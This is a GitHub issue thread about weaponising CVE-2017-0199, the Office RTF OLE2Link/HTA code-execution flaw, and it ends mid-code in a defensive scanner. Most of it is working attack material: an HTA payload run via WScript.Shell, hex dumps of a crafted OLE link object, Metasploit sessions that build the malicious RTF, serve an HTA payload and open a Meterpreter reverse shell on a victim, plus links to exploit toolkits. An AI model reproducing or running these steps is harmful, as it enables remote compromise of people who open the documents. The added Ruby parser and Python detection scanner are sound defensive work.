Closed nixawk closed 7 years ago
If regedit shows
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{00000300-0000-0000-C000-000000000046}\InprocServer32]
@="ole32.dll"
poc.rtf
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>
Windows fails to execute the payload. StdOleLink is the key.
Have you got it working?
I host RTF and autolink then switch to HTA with application content type. Works fine this way.
Autolaunch too
@vysec Could you show more details about your lab and Office version? I've tested it on Windows 7 Ultimate (not SP1) with Office 2010, but it failed.
If Windows 7 SP1, everything goes well.
https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Office 2007 Service Pack 3
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Windows Vista Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
OK works fine now :)
Some "technical reports" out there are reporting false samples... Not every random OLE2Link is the 1-day. There's a 0-day technique out there to bypass some prompts / measures, but the 1-day in question isn't what's displayed in some of the reports, as the payload's not even correct...
Is there a way to create a vulnerable docx with Metasploit?
modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.
I'll have a look after work
I've created an .rb script to parse the OLE object bin as follows. Could anyone show me how to parse data = ministream.instance_variable_get(:@data)? Is there a format link for the data? How to create new data to replace it?
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
*** ministream (384 bytes):
{
sid => 0x0,
_ab => "Root Entry", # Directory Entry Name
_cb => 0x0016, # Directory Entry Name Length
_mse => 0x02, # Object Type
_bflags => 0x00, # Color Flag
_sidLeftSib => 0xffffffff, # Left Sibling ID
_sidRightSib => 0xffffffff, # Right Sibling ID
_sidChild => 0xffffffff, # Child ID
_clsId => 00000000-0000-0000-0000-000000000000, # CLSID
_dwUserFlags => 0x00000000, # State Flags
_ctime => 00 00 00 00 00 00 00 00 |........| # Creation Time
_mtime => 00 00 00 00 00 00 00 00 |........| # Modification Time
_sectStart => 0xfffffffe, # Starting Sector Location
_ulSize => 0x0000000000000180, # Stream Size
data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 6e 00 00 00 e0 c9 ea 79 |........n......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00 |.........K..V...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00 |h.t.t.p.:././.1.|
39 00 32 00 2e 00 31 00 36 00 38 00 2e 00 32 00 |9.2...1.6.8...2.|
30 00 36 00 2e 00 31 00 34 00 34 00 2f 00 70 00 |0.6...1.4.4./.p.|
6f 00 63 00 2e 00 72 00 74 00 66 00 00 00 79 58 |o.c...r.t.f...yX|
81 f4 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 |..;..H.,.]..'c..|
00 00 a5 ab 00 00 ff ff ff ff 06 09 02 00 00 00 |................|
00 00 c0 00 00 00 00 00 00 46 00 00 00 00 ff ff |.........F......|
ff ff 00 00 00 00 00 00 00 00 e0 81 81 54 cb b4 |.............T..|
d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
10 00 03 00 0d 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
1e 00 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 |..http://192.168|
2e 32 30 36 2e 31 34 34 2f 70 6f 63 2e 72 74 66 |.206.144/poc.rtf|
00 00 bb bb cc cc 1e 00 68 00 74 00 74 00 70 00 |........h.t.t.p.|
3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00 |:././.1.9.2...1.|
36 00 38 00 2e 00 32 00 30 00 36 00 2e 00 31 00 |6.8...2.0.6...1.|
34 00 34 00 2f 00 70 00 6f 00 63 00 2e 00 72 00 |4.4./.p.o.c...r.|
74 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 |t.f.............|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
}
require 'ole/storage'   # ruby-ole gem
require 'rex/ole'       # Rex::OLE from metasploit-framework

filename = 'test.doc_object_000001BC.bin'   # OLE object carved out of the RTF

# ole/storage: count the directory entries and print the storage tree
ole = Ole::Storage.open(filename, 'rb+')
puts ole.dirents.length
puts ole.root.to_tree
ole.close

# rex/ole: dump the raw mini stream (the Root Entry's data; the "\x01Ole" stream starts at mini sector 0)
ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
ministream = ole.instance_variable_get(:@ministream)
data = ministream.instance_variable_get(:@data)
File.binwrite('ole-ministream.bin', data)
CVE-2017-0199 ->> ruby read_ole.rb
From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :
14: require 'rex/ole'
15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
16: ministream = ole.instance_variable_get(:@ministream)
17: # puts ministream.instance_variable_get(:@data)
18:
=> 19: binding.pry
[1] pry(main)> ministream
=> #<Rex::OLE::Stream:0x007fc37584de48
@_ab="Root Entry",
@_bflags=0,
@_cb=nil,
@_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">,
@_ctime="\x00\x00\x00\x00\x00\x00\x00\x00",
@_dwUserFlags=0,
@_mse=2,
@_mtime="\x00\x00\x00\x00\x00\x00\x00\x00",
@_sectStart=4294967294,
@_sidChild=4294967295,
@_sidLeftSib=4294967295,
@_sidRightSib=4294967295,
@_ulSize=512,
@children=[],
@data=
"\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
@offset=0,
@sid=0,
@stg=
header = {
_abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
_clid => 00000000-0000-0000-0000-000000000000,
_uMinorVersion => 0x003e,
_uMajorVersion => 0x0003,
_uByteOrder => 0xfffe,
_uSectorShift => 0x0009,
_uMiniSectorShift => 0x0006,
_csectDir => 0x00000000,
_csectFat => 0x00000001,
_sectDirStart => 0x00000001,
_signature => 0x00000000,
_uMiniSectorCutoff => 0x00001000,
_sectMiniFatStart => 0x00000002,
_csectMiniFat => 0x00000001,
_sectDifStart => 0xfffffffe,
_csectDif => 0x00000000
}
*** 109 DIFAT sectors
{ 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 FAT sectors
{ FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 MiniFAT sectors:
{ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** ministream (512 bytes):
{
sid => 0x0,
_ab => "Root Entry",
_cb => 0x0016,
_mse => 0x02,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0xfffffffe,
_ulSize => 0x0000000000000200,
data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79 |........\......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00 |.........K..D...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 |h.t.t.p.:././.h.|
79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00 |y.o.e.y.e.e.p...|
77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00 |w.s./.t.e.m.p.l.|
61 00 74 00 65 00 2e 00 64 00 6f 00 63 00 00 00 |a.t.e...d.o.c...|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4 |............yX..|
3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00 |;..H.,.]..'c....|
a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11 |........ i3%....|
8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff |.....ho.........|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
}
*** 3 directory entries
{
sid => 0x0,
_ab => "Root Entry",
_cb => 0x0016,
_mse => 0x05,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0x00000001,
_clsId => 00000300-0000-0000-c000-000000000046,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 10 4e ab 9b 42 49 d2 01 |.N..BI..|
_sectStart => 0x00000003,
_ulSize => 0x0000000000000200,
*children* =>
{
sid => 0x1,
_ab => "\x01Ole",
_cb => 0x000a,
_mse => 0x02,
_bflags => 0x01,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0x00000002,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0x00000000,
_ulSize => 0x00000000000001a8,
data =>
--NOT OPENED YET--
}
{
sid => 0x2,
_ab => "\x03ObjInfo",
_cb => 0x0012,
_mse => 0x02,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0x00000007,
_ulSize => 0x0000000000000006,
data =>
--NOT OPENED YET--
}
}
>
So I applied the patch... but the machine is still vulnerable... ???
@busterb @vysec The CVE-2017-0199 module is created. Please wait for more tests.
msf exploit(ms17_0199_rtf) > info
Name: MS14-017 Microsoft Word RTF Object Confusion
Module: exploit/windows/fileformat/ms17_0199_rtf
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-04-14
Provided by:
Haifei Li
ryHanson
wdormann
DidierStevens
vysec
Nixawk
Available targets:
Id Name
-- ----
0 Microsoft Office
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
TARGETURI http://192.168.206.144/poc.rtf yes The path to a hta file.
Payload information:
Description:
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute response in hta format. This bug was originally seen
being exploited in the wild starting in Oct 2016. This module was
created by reversing a public malware sample.
References:
https://cvedetails.com/cve/CVE-2017-0199/
https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://www.microsoft.com/en-us/download/details.aspx?id=10725
https://msdn.microsoft.com/en-us/library/dd942294.aspx
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
msf exploit(ms17_0199_rtf) > run
[+] stored at /Users/nixawk/.msf4/local/local_1492191967.bin
~ ->> rtfobj /Users/nixawk/.msf4/local/local_1492191967.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: '/Users/nixawk/.msf4/local/local_1492191967.bin' - size: 5751 bytes
---+----------+-------------------------------+-------------------------------
id |index |OLE Object |OLE Package
---+----------+-------------------------------+-------------------------------
0 |000001BCh |format_id: 2 |Not an OLE Package
| |class name: 'OLE2Link' |
| |data size: 2560 |
---+----------+-------------------------------+-------------------------------
msf exploit(hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Powershell x86
msf exploit(hta_server) > set URIPATH /test
URIPATH => /test
msf exploit(hta_server) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/ms17_0199_rtf
msf exploit(ms17_0199_rtf) > show options
Module options (exploit/windows/fileformat/ms17_0199_rtf):
Name Current Setting Required Description
---- --------------- -------- -----------
TARGETURI http://example.com/test.rtf yes The path to a hta file.
Exploit target:
Id Name
-- ----
0 Microsoft Office
msf exploit(ms17_0199_rtf) > set TARGETURI http://192.168.1.102:8080/test
TARGETURI => http://192.168.1.102:8080/test
msf exploit(ms17_0199_rtf) > run
[+] stored at /Users/Open-Security/.msf4/local/local_1492193615.bin
msf exploit(ms17_0199_rtf) >
[*] 192.168.1.103 hta_server - Delivering Payload
[*] 192.168.1.103 hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:2187) at 2017-04-14 13:17:45 -0500
msf exploit(ms17_0199_rtf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : JOHN
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : SECLAB
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
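Added example, not part of the thread, the module or oletools: the rtfobj table above (format_id 2, class name OLE2Link, data size 2560) is read off the OLE1.0 ObjectHeader that precedes the embedded compound file inside `\objdata` (MS-OLEDS: OLEVersion, FormatID, three length-prefixed ANSI strings, then NativeDataSize and the data for an embedded object). The Ruby below extracts that header from an RTF and reports the same three facts, plus whether the `\object` group carries `\objautlink` / `\objupdate`, the control words that make Word resolve the link when the document opens. The sample RTF is constructed inline and its native data is only the compound-file signature plus padding, not a real OLE2 file; the parser handles plain hex `\objdata` only, not `\bin` runs or the obfuscation real samples use.

```ruby
# Added example (not from the thread, the module or oletools): read the OLE1.0
# ObjectHeader that rtfobj reports from an RTF's \objdata hex (MS-OLEDS):
#   OLEVersion(4) FormatID(4) ClassName TopicName ItemName   (length-prefixed ANSI)
#   FormatID 2 (embedded): NativeDataSize(4) NativeData      (here: a compound file)
CFB_MAGIC = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1".b   # OLE2 / CFB signature

# LengthPrefixedAnsiString: 4-byte length that counts the trailing NUL, then the bytes
def read_lp_ansi(blob, off)
  len = blob[off, 4].to_s.unpack1('V').to_i
  [blob[off + 4, len].to_s.chomp("\x00"), off + 4 + len]
end

def lp_ansi(str)
  return [0].pack('V') if str.empty?
  [str.bytesize + 1].pack('V') + str.b + "\x00"
end

# One hash per \object group that carries \objdata. Plain hex only; real samples also
# use \bin runs and control-word obfuscation, which rtfobj handles and this does not.
def parse_rtf_objects(rtf)
  rtf.split(/(?=\\object(?![a-z]))/).map do |chunk|
    next unless chunk.start_with?('\\object')
    hex = chunk[/\\objdata\s*([0-9A-Fa-f\s]+)/, 1]
    next unless hex
    blob = [hex.gsub(/\s+/, '')].pack('H*')
    ole_version, format_id = blob.unpack('VV')
    class_name, off = read_lp_ansi(blob, 8)
    topic_name, off = read_lp_ansi(blob, off)
    item_name,  off = read_lp_ansi(blob, off)
    native = nil
    if format_id == 2                                 # EmbeddedObject
      size   = blob[off, 4].to_s.unpack1('V').to_i
      native = blob[off + 4, size].to_s
    end
    { ole_version: ole_version, format_id: format_id, class_name: class_name,
      topic_name: topic_name, item_name: item_name,
      native_size: native && native.bytesize,
      is_cfb: native ? native.start_with?(CFB_MAGIC) : false,
      autolink: chunk.include?('\\objautlink'),       # linked object
      autoupdate: chunk.include?('\\objupdate') }     # update (fetch) the link on open
  end.compact
end

# Constructed test input: same header shape as the rtfobj table above (OLE2Link,
# format_id 2), but the "native data" is only the CFB signature plus zero padding.
def build_rtf_sample
  native = CFB_MAGIC + ("\x00" * 8)
  header = [0x501, 2].pack('VV') + lp_ansi('OLE2Link') + lp_ansi('') + lp_ansi('') +
           [native.bytesize].pack('V') + native
  "{\\rtf1{\\object\\objautlink\\objupdate\\rsltpict{\\*\\objdata #{header.unpack1('H*')}}{\\result{\\pict}}}}"
end

p parse_rtf_objects(build_rtf_sample) if $PROGRAM_NAME == __FILE__
```

The triage rule that follows from the rtfobj table: format_id 2, class name OLE2Link, native data starting with D0 CF 11 E0 and `\objupdate` on the same `\object` group is exactly the shape of the file the module writes above, and it is the combination a detection should key on rather than the class name alone.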
Nice work @nixawk !
Nice work @nixawk :)
Hi man! Can you provide the ms17_0199_rtf.rb code @nixawk
ruby code?? @nixawk
metasploit?
@demonsec666 I think Nixawk will submit it as a PR. This isn't a support thread.
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
I will. Please wait several days.
thanks @nixawk
@vysec @busterb @demonsec666 Please check https://github.com/rapid7/metasploit-framework/pull/8254
Nice work! Thanks :)
gre
Nice one, thank you.
Meanwhile, this was my attempt to get a meterpreter shell through CVE-2017-0199.
If the dev team handles https://github.com/rapid7/metasploit-framework/pull/8253, maybe I'll try a new one with a meterpreter session.
Just FYI. OLE links made in 2016 differ from other versions such as 2013. Therefore I found that a 2016 document could not be triggered on a 2013 machine.
@vysec Could you share a copy?
I have been trying to figure this out but don't seem to get it. I host a .hta file and insert it via Insert > Object, but can't see any hta file executing. Can someone share how this can be achieved?
Hi,
Are you trying with "exploit/windows/misc/hta_server"? It was not working for me either. It pops up a black screen but no reverse connection from the reverse shell.
To overcome this I wrote a quick py script which can generate a malicious doc based on @nixawk's https://github.com/nixawk template and also act as an HTA web server to deliver the payloads.
Have a look @ https://github.com/bhdresh/CVE-2017-0199
Regards, -Bhadresh
Please try it with an IE cache clean.
Thanks for your response.
Am I doing this wrong? What I did was: I host an .hta file, insert it as an object in MS Word, then save it as .rtf.
I tried your Python script before messaging here but it gives this error in the image.
Can you kindly put me through properly, as I am using a custom .hta and a custom way to get a connection from the user who runs the .rtf file?
@hostbob I've created a py script for the job.
https://github.com/nixawk/labs/blob/master/CVE-2017-0199/exploit.py
@hostbob,
Hosting and inserting an .hta file manually will execute it directly while inserting it into the RTF.
For the script, try executing the Python script as "python cve-2017-0199_toolkit.py -h"
https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/master/cve-2017-0199_toolkit.py
Regards, -Bhadresh
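For readers on the detection side of this thread: the documents being discussed are RTFs whose inserted object is an OLE link (OLE2Link, the StdOleLink CLSID quoted in the registry key at the top of the issue) that updates itself when the file is opened, rather than an ordinary embedded object. The following scanner is an added example, not code from the thread or from any of the toolkits linked here. It walks the `\object` groups of an RTF, hex-decodes each `\*\objdata` payload and reports whether the object is linked (`\objautlink`), forces an update on open (`\objupdate`) and carries the OLE2Link marker or the StdOleLink CLSID. The two sample documents are constructed inline; the "suspicious" one contains only those marker bytes, not a real OLE stream.

```python
import re
import uuid

# StdOleLink CLSID quoted from the registry key earlier in this thread,
# in the 16-byte little-endian layout GUIDs have inside OLE streams.
STDOLELINK_CLSID = uuid.UUID("{00000300-0000-0000-C000-000000000046}").bytes_le

OBJECT_OPEN = re.compile(rb"\{\\object\b")
OBJDATA = re.compile(rb"\{\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}")


def _group_at(data: bytes, start: int) -> bytes:
    """Return the brace-delimited RTF group that opens at data[start] == b'{'."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":            # skip escaped characters such as \{ and \}
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
        i += 1
    return data[start:]           # unterminated group: take the rest


def _objdata(group: bytes) -> bytes:
    """Hex-decode the \\*\\objdata payload of an object group (empty if absent)."""
    m = OBJDATA.search(group)
    if not m:
        return b""
    hexdata = re.sub(rb"\s+", b"", m.group(1))
    return bytes.fromhex(hexdata[: len(hexdata) & ~1].decode("ascii"))


def scan_rtf(data: bytes) -> list:
    """Return one finding dict per \\object group found in the RTF bytes."""
    findings = []
    for index, m in enumerate(OBJECT_OPEN.finditer(data)):
        group = _group_at(data, m.start())
        blob = _objdata(group)
        finding = {
            "object": index,
            "autolink": b"\\objautlink" in group,   # linked, not embedded
            "objupdate": b"\\objupdate" in group,   # update forced on open
            "ole2link": b"OLE2Link" in blob,
            "stdolelink_clsid": STDOLELINK_CLSID in blob,
        }
        # A linked OLE2Link object that refreshes itself on open is the shape
        # of document this thread is about; a plain embedded object is not.
        finding["suspicious"] = finding["ole2link"] and (
            finding["autolink"] or finding["objupdate"])
        findings.append(finding)
    return findings


def _objdata_group(blob: bytes) -> bytes:
    return b"{\\*\\objdata " + blob.hex().encode("ascii") + b"}"


# Constructed samples (not real documents). The suspicious one carries only the
# marker bytes a scanner keys on, not a functioning OLE stream.
SUSPICIOUS_RTF = (
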